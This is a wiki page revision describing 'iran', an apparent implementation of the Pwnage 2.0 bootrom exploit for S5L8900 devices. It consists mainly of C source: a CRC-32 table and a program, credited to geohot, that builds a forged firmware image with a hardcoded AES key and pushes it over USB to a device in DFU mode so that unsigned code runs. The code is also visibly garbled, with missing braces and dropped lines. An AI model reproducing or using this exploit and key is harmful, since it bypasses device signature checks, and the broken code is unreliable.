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(New page: iran is an implementation of the Pwnage_2.0 exploit this injected a pwnd DFU_Mode allowing custom firmware to be restored to. == external links == *[https://sites.google.com/sit...)
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Revision as of 12:32, 30 November 2010

iran is an implementation of the Pwnage_2.0 exploit this injected a pwnd DFU_Mode allowing custom firmware to be restored to.

external links

pwnd dfu code for S5L8900

//======================================================== file = crc32.c =====
//=  Program to compute CRC-32 using the "table method" for 8-bit subtracts   =
//=  Notes: Uses the standard "Charles Michael Heard" code available from     =
//=         http://cell-relay.indiana.edu/cell-relay/publications/software    =
//=         /CRC which was adapted from the algorithm described by Avarm      =
//=         Perez, "Byte-wise CRC Calculations," IEEE Micro 3, 40 (1983).     =
//=  Build:  bcc32 crc32.c, gcc crc32.c                                       =
//=  History:  KJC (8/24/00) - Genesis (from Heard code, see above)           =
//----- Type defines ----------------------------------------------------------
typedef unsigned char      byte;    // Byte is a char
typedef unsigned short int word16;  // 16-bit word is a short int
typedef unsigned int       word32;  // 32-bit word is an int
//----- Defines ---------------------------------------------------------------
#define POLYNOMIAL 0x04c11db7L      // Standard CRC-32 ppolynomial
//----- Gloabl variables ------------------------------------------------------
unsigned long  crctable[256] =
0x00000000L, 0x77073096L, 0xEE0E612CL, 0x990951BAL,
0x076DC419L, 0x706AF48FL, 0xE963A535L, 0x9E6495A3L,
0x0EDB8832L, 0x79DCB8A4L, 0xE0D5E91EL, 0x97D2D988L,
0x09B64C2BL, 0x7EB17CBDL, 0xE7B82D07L, 0x90BF1D91L,
0x1DB71064L, 0x6AB020F2L, 0xF3B97148L, 0x84BE41DEL,
0x1ADAD47DL, 0x6DDDE4EBL, 0xF4D4B551L, 0x83D385C7L,
0x136C9856L, 0x646BA8C0L, 0xFD62F97AL, 0x8A65C9ECL,
0x14015C4FL, 0x63066CD9L, 0xFA0F3D63L, 0x8D080DF5L,
0x3B6E20C8L, 0x4C69105EL, 0xD56041E4L, 0xA2677172L,
0x3C03E4D1L, 0x4B04D447L, 0xD20D85FDL, 0xA50AB56BL,
0x35B5A8FAL, 0x42B2986CL, 0xDBBBC9D6L, 0xACBCF940L,
0x32D86CE3L, 0x45DF5C75L, 0xDCD60DCFL, 0xABD13D59L,
0x26D930ACL, 0x51DE003AL, 0xC8D75180L, 0xBFD06116L,
0x21B4F4B5L, 0x56B3C423L, 0xCFBA9599L, 0xB8BDA50FL,
0x2802B89EL, 0x5F058808L, 0xC60CD9B2L, 0xB10BE924L,
0x2F6F7C87L, 0x58684C11L, 0xC1611DABL, 0xB6662D3DL,
0x76DC4190L, 0x01DB7106L, 0x98D220BCL, 0xEFD5102AL,
0x71B18589L, 0x06B6B51FL, 0x9FBFE4A5L, 0xE8B8D433L,
0x7807C9A2L, 0x0F00F934L, 0x9609A88EL, 0xE10E9818L,
0x7F6A0DBBL, 0x086D3D2DL, 0x91646C97L, 0xE6635C01L,
0x6B6B51F4L, 0x1C6C6162L, 0x856530D8L, 0xF262004EL,
0x6C0695EDL, 0x1B01A57BL, 0x8208F4C1L, 0xF50FC457L,
0x65B0D9C6L, 0x12B7E950L, 0x8BBEB8EAL, 0xFCB9887CL,
0x62DD1DDFL, 0x15DA2D49L, 0x8CD37CF3L, 0xFBD44C65L,
0x4DB26158L, 0x3AB551CEL, 0xA3BC0074L, 0xD4BB30E2L,
0x4ADFA541L, 0x3DD895D7L, 0xA4D1C46DL, 0xD3D6F4FBL,
0x4369E96AL, 0x346ED9FCL, 0xAD678846L, 0xDA60B8D0L,
0x44042D73L, 0x33031DE5L, 0xAA0A4C5FL, 0xDD0D7CC9L,
0x5005713CL, 0x270241AAL, 0xBE0B1010L, 0xC90C2086L,
0x5768B525L, 0x206F85B3L, 0xB966D409L, 0xCE61E49FL,
0x5EDEF90EL, 0x29D9C998L, 0xB0D09822L, 0xC7D7A8B4L,
0x59B33D17L, 0x2EB40D81L, 0xB7BD5C3BL, 0xC0BA6CADL,
0xEDB88320L, 0x9ABFB3B6L, 0x03B6E20CL, 0x74B1D29AL,
0xEAD54739L, 0x9DD277AFL, 0x04DB2615L, 0x73DC1683L,
0xE3630B12L, 0x94643B84L, 0x0D6D6A3EL, 0x7A6A5AA8L,
0xE40ECF0BL, 0x9309FF9DL, 0x0A00AE27L, 0x7D079EB1L,
0xF00F9344L, 0x8708A3D2L, 0x1E01F268L, 0x6906C2FEL,
0xF762575DL, 0x806567CBL, 0x196C3671L, 0x6E6B06E7L,
0xFED41B76L, 0x89D32BE0L, 0x10DA7A5AL, 0x67DD4ACCL,
0xF9B9DF6FL, 0x8EBEEFF9L, 0x17B7BE43L, 0x60B08ED5L,
0xD6D6A3E8L, 0xA1D1937EL, 0x38D8C2C4L, 0x4FDFF252L,
0xD1BB67F1L, 0xA6BC5767L, 0x3FB506DDL, 0x48B2364BL,
0xD80D2BDAL, 0xAF0A1B4CL, 0x36034AF6L, 0x41047A60L,
0xDF60EFC3L, 0xA867DF55L, 0x316E8EEFL, 0x4669BE79L,
0xCB61B38CL, 0xBC66831AL, 0x256FD2A0L, 0x5268E236L,
0xCC0C7795L, 0xBB0B4703L, 0x220216B9L, 0x5505262FL,
0xC5BA3BBEL, 0xB2BD0B28L, 0x2BB45A92L, 0x5CB36A04L,
0xC2D7FFA7L, 0xB5D0CF31L, 0x2CD99E8BL, 0x5BDEAE1DL,
0x9B64C2B0L, 0xEC63F226L, 0x756AA39CL, 0x026D930AL,
0x9C0906A9L, 0xEB0E363FL, 0x72076785L, 0x05005713L,
0x95BF4A82L, 0xE2B87A14L, 0x7BB12BAEL, 0x0CB61B38L,
0x92D28E9BL, 0xE5D5BE0DL, 0x7CDCEFB7L, 0x0BDBDF21L,
0x86D3D2D4L, 0xF1D4E242L, 0x68DDB3F8L, 0x1FDA836EL,
0x81BE16CDL, 0xF6B9265BL, 0x6FB077E1L, 0x18B74777L,
0x88085AE6L, 0xFF0F6A70L, 0x66063BCAL, 0x11010B5CL,
0x8F659EFFL, 0xF862AE69L, 0x616BFFD3L, 0x166CCF45L,
0xA00AE278L, 0xD70DD2EEL, 0x4E048354L, 0x3903B3C2L,
0xA7672661L, 0xD06016F7L, 0x4969474DL, 0x3E6E77DBL,
0xAED16A4AL, 0xD9D65ADCL, 0x40DF0B66L, 0x37D83BF0L,
0xA9BCAE53L, 0xDEBB9EC5L, 0x47B2CF7FL, 0x30B5FFE9L,
0xBDBDF21CL, 0xCABAC28AL, 0x53B39330L, 0x24B4A3A6L,
0xBAD03605L, 0xCDD70693L, 0x54DE5729L, 0x23D967BFL,
0xB3667A2EL, 0xC4614AB8L, 0x5D681B02L, 0x2A6F2B94L,
0xB40BBE37L, 0xC30C8EA1L, 0x5A05DF1BL, 0x2D02EF8DL
//----- Prototypes ------------------------------------------------------------
word32 update_crc(word32 crc_accum, byte *data_blk_ptr, word32 data_blk_size);
//=  CRC32 generation                                                         =
word32 update_crc(word32 crc, byte *data_blk_ptr, word32 data_blk_size)
  register word32 i, j;
  for (j = 0; j < data_blk_size; j++) {
		crc = crctable[(crc ^ data_blk_ptr[j]) & 0xFFL] ^ (crc >> 8);
  return crc;

source code

#include "usb.h"
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include "crc.h"
#include "openssl/aes.h"
#include "openssl/sha.h"
const unsigned char key837[]={0x18,0x84,0x58,0xA6,0xD1,0x50,0x34,0xDF,0xE3,0x86,0xF2,0x3B,0x61,0xD4,0x37,0x74};
void hexdump(unsigned char *a, int c) { int b; for(b=0;b<c;b++) { if(b%16==0&&b!=0) printf("\n"); printf("%2.2X ",a[b]); } printf("\n"); }
int main(int argc, char *argv[])
	printf("dfu unsigned execute by geohot\n");
	printf("based off the dev teams pwnage 2.0 exploit\n");
	int a;
   char buf[255];
   unsigned char *fbuf;
//building file
	if(argc<2) { printf("usage: %s <filename>\n",argv[0]); return -1; }
	FILE *cert=fopen("cert","rb");
	FILE *f=fopen(argv[1], "rb");
	if(cert==0||f==0) { printf("file not found\n"); return -1; }
	fseek(cert, 0, SEEK_END);
	int len_cert = ftell(cert);
	fseek(cert, 0, SEEK_SET);
	fseek(f, 0, SEEK_END);
	int len = ftell(f);
	fseek(f, 0, SEEK_SET);
	fbuf=(unsigned char *)malloc(0x800+len+len_cert+0x10);
	fclose(f); fclose(cert);
	printf("files read %X %X\n",len,len_cert);
	strcpy(fbuf, "89001.0"); 
	memcpy(&fbuf[0xC],&len,0x4);			//data size
	memcpy(&fbuf[0x10],&len,0x4);		//sig offset
	memcpy(&fbuf[0x14],&a,0x4);			//cert offset
	memcpy(&fbuf[0x18],&a,0x4);			//cert length
	printf("header generated\n");
//hashing header
	unsigned char shaout[0x14];
	AES_KEY mkey;
	AES_set_encrypt_key(key837, 0x80, &mkey);
	unsigned char iv[0x10]; memset(iv,0,0x10);
	AES_cbc_encrypt(shaout, shaout, 0x10, &mkey, iv, AES_ENCRYPT);
//appending dfu footer
	unsigned int crc=0xFFFFFFFF;
	const char header[]={0xff,0xff,0xff,0xff,0xac,0x05,0x00,0x01,0x55,0x46,0x44,0x10};
	crc=update_crc(crc, fbuf, 0x800+len+len_cert+0xC);
	for(a=0;a<4;a++) { fbuf[0x800+len+len_cert+0xC+a]=crc&0xFF; crc=crc>>8; }
//sending file
   printf("USB ready\n");
   struct usb_bus *bus;
   struct usb_device *dev;
   struct usb_dev_handle *idev=0;
   int dtype=0;
       printf("BUS found\n");
           printf(" %4.4X %4.4X\n", dev->descriptor.idVendor, dev->descriptor.idProduct);
           if(dev->descriptor.idVendor==0x5ac && dev->descriptor.idProduct==0x1222)      //DFU Mode
               printf("Found DFU\n");
	if(idev==0) { printf("No device found\n"); return -1;}
	int c=0;
	printf("sending 0x%x bytes\n", (0x800+len+len_cert+0x10));
		int sl=((0x800+len+len_cert+0x10)-a);
		if(sl<0) sl=0;
		if(sl>0x800) sl=0x800;
		//printf("%X %X\n",a,sl);
		if(usb_control_msg(idev, 0x21, 1, c, 0, &fbuf[a], sl, 1000)==sl) printf(".");
		else printf("x");
		if(sl==0) printf("\n");
		int b=0;
		while(usb_control_msg(idev, 0xA1, 3, 0, 0, buf, 6, 1000)==6&&b<5)
			if(sl==0) hexdump(buf, 6);
			if(buf[4]==5) break;
	return 0;